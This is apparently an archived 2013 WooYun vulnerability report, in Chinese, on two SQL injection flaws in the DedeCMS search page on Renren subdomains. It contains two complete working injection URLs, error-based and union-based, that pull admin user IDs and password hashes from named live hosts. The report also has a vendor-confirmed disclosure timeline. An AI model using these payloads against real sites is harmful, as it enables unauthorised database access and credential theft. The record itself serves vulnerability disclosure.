人人网分站注入两枚

编号24078
Urlhttp://www.wooyun.org/bug.php?action=view&id=24078
漏洞状态厂商已经确认
漏洞标题人人网分站注入两枚
漏洞类型SQL注射漏洞
厂商人人网
白帽子煦阳。
提交日期2013-05-20 14:12:00
公开日期2013-07-04 14:13:00
修复时间(not set)
确认时间2013-05-20 00:00:00
Confirm Spend0
漏洞标签
关注数0
收藏数0
白帽评级
白帽自评rank2
厂商评级
厂商评rank5
漏洞简介
刷分。。= =
漏洞细节

没什么好说的。 dedecms搜索注入。

http://www.frg.renren.com/plus/search.php?keyword=as&typeArr[111%[email protected]%60\%27%60%29+and+%28SELECT+1+FROM+%28select+count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28select+CONCAT%280x7c,userid,0x7c,pwd%29+from+%60%[email protected]__admin%60+limit+0,1%29,1,62%29%29%29a+from+information_schema.tables+group+by+a%29b%29%[email protected]%60\%27%60+]=a


http://www.ztx.renren.com/plus/search.php?keyword=as&typeArr[111%[email protected]%60\%27%60%29+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+%60%[email protected]__admin%60%[email protected]%60\%27%60+]=a


POC

x.jpg


xx.jpg

修复方案

看着修复呗~ 网上很多方案。。

状态信息 2013-05-20: 细节已通知厂商并且等待厂商处理中
2013-05-20: 厂商已经确认,细节仅向厂商公开
2013-05-30: 细节向核心白帽子及相关领域专家公开
2013-06-09: 细节向普通白帽子公开
2013-06-19: 细节向实习白帽子公开
2013-07-04: 细节向公众公开
厂商回复感谢!
回应信息危害等级:中漏洞Rank:5 确认时间:2013-05-20 14:38